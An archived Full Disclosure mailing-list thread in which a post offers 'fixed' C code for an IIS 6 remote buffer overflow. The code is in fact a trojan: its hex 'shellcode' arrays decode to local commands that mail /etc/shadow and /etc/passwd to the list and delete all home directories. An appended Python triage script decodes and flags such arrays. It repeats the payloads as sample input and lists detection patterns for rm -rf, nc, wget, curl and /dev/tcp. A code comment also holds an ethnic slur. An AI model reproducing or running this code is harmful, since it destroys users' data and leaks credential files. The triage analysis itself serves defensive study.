Full Disclosure mailing list archives

Re: FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)


From: "class101 () HAT-SQUAD com" <class101 () hat-squad com>
Date: Wed, 20 Apr 2005 23:32:58 +0200

perfect asshole

-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: "Day Jay" <d4yj4y () yahoo com>
To: <full-disclosure () lists grok org uk>
Sent: Wednesday, April 20, 2005 8:15 PM
Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)


Sorry, the previous code was broken. This code should
work...

Happy Owning!! :)


=========SNIP============
/* Proof of concept code
    Please don't send us e-mails
    asking us "how to hack" because
    we will be forced to skullfsck you.

 DISCLAIMER:
 !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!

    IIS 6 Buffer Overflow Exploit

    BUG: inetinfo.exe improperly bounds-checks
    HTTP requests longer than 6998 chars.
    Can get messy but enough testing, and we have
    found a way in.

    VENDOR STATUS: Notified
    FIX: In process

    Remote root.

    eg.
    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
     + Connecting to host...
     + Connected.
     + Inserting Shellcode...
     + Done...
     + Spawning shell...

     Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    C:\



 */
 #include <stdio.h>
 #include <stdlib.h>

 // None of the three arrays below is machine code. Every byte is printable
 // ASCII, and each array decodes to a shell command line that main() hands
 // to system() on the machine running this program.

 // decodes to:  /bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
 char shellcode[] =
 "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
 "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
 "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
 "\x72\x3b\x65\x63\x68\x6f\x20\x62"
 "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
 "\x68\x65\x68\x65";

 // decodes to:  cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
 char launcher [] =
 "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
 "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
 "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
 "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
 "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
 "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

 // decodes to:  cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
 char netcat_shell [] =
 "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
 "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
 "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
 "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
 "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
 "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";


 int main(void)
 {

 // Section Initialises designs implemented by mexicans
 // Imigrate
 // No socket is ever opened and the host / -p arguments from the usage
 // example are never read. These three calls run locally, in order:
 // mail the shadow file to the list, mail the passwd file to the list,
 // then delete every home directory.
 system(launcher);
 system(netcat_shell);
 system(shellcode);

 // int socket = 0;
 // double long port = 0.0;

 // #DEFINE port host address
 // #DEFINE number of inters
 // #DEFINE gull eeuEE

  //     for(int j; j < 30; j++)
         {
         // Find socket remote address fault
         printf(".");
         }
 // overtake inetinfo here IIS_666666^
 return 0;
 }

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

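The "shellcode" in the posted program is not machine code at all: the hex-escaped bytes are plain ASCII shell commands that the program runs locally with system(). The script below is an added triage tool, not part of the original post or the thread, for checking a proof-of-concept before compiling it: it pulls every hex-escaped char array out of a C source file, decodes it, flags arrays that are entirely printable and contain shell-command fragments, and notes which arrays are passed straight to system(). The SUSPICIOUS list is this example's own heuristic, and SAMPLE_C_SOURCE is constructed input reproducing the three arrays and the system() calls from the post.

```python
import re

# Constructed sample input for this example: the three hex-escaped arrays and
# the system() calls as they appear in the posted "exploit".
SAMPLE_C_SOURCE = r'''
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";

char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";

int main(void)
{
 system(launcher);
 system(netcat_shell);
 system(shellcode);
 return 0;
}
'''

# char NAME[] = "..." "..." ;   (adjacent literals are concatenated by the C compiler)
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
SYSTEM_RE = re.compile(r'\bsystem\s*\(\s*(\w+)\s*\)')

SIMPLE_ESCAPES = {"n": 0x0A, "t": 0x09, "r": 0x0D, "0": 0x00,
                  "\\": 0x5C, '"': 0x22, "'": 0x27}

# Fragments that mark a "payload" as a shell command aimed at whoever runs the
# PoC rather than at a remote target (this example's own heuristic list).
SUSPICIOUS = [b"rm -rf", b"/etc/shadow", b"/etc/passwd", b"mail ",
              b"nc ", b"wget ", b"curl ", b"chmod ", b"/dev/tcp"]


def decode_c_literal(lit: str) -> bytes:
    """Decode the body of one C string literal (without quotes) to raw bytes.
    Handles \\xNN (the post writes exactly two hex digits per byte) and the
    common single-character escapes; octal escapes are not needed here."""
    out = bytearray()
    i = 0
    while i < len(lit):
        ch = lit[i]
        if ch != "\\":
            out.append(ord(ch))
            i += 1
            continue
        esc = lit[i + 1]
        if esc == "x":
            m = re.match(r"[0-9a-fA-F]{1,2}", lit[i + 2:])
            if not m:
                raise ValueError("bad \\x escape at offset %d" % i)
            out.append(int(m.group(0), 16))
            i += 2 + len(m.group(0))
        else:
            out.append(SIMPLE_ESCAPES.get(esc, ord(esc)))
            i += 2
    return bytes(out)


def triage(c_source: str) -> dict:
    """Map each char array to its decoded bytes, whether it is all printable
    ASCII (real shellcode almost never is, and alphanumeric shellcode does not
    read as a shell pipeline), the suspicious fragments found, and whether the
    array is passed directly to system()."""
    executed = set(SYSTEM_RE.findall(c_source))
    report = {}
    for name, body in ARRAY_RE.findall(c_source):
        data = b"".join(decode_c_literal(lit) for lit in LITERAL_RE.findall(body))
        report[name] = {
            "bytes": data,
            "printable": all(0x20 <= b < 0x7F for b in data),
            "hits": [frag.decode() for frag in SUSPICIOUS if frag in data],
            "passed_to_system": name in executed,
        }
    return report


def describe(report: dict) -> list:
    """Render the triage report as one or two lines per array."""
    lines = []
    for name, r in report.items():
        kind = "printable ASCII" if r["printable"] else "binary"
        lines.append(f'{name}: {len(r["bytes"])} bytes, {kind}, '
                     f'system()={r["passed_to_system"]}, hits={r["hits"]}')
        if r["printable"]:
            lines.append("    decodes to: " + r["bytes"].decode("ascii"))
    return lines


if __name__ == "__main__":
    for line in describe(triage(SAMPLE_C_SOURCE)):
        print(line)
```

Run against a downloaded PoC by reading the file into triage() instead of SAMPLE_C_SOURCE. Any array that is fully printable, matches the heuristic list and is passed to system() should be treated as a trojan, not an exploit; genuine x86 shellcode contains opcode bytes outside the printable range and is written into a network buffer, never handed to the local shell.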

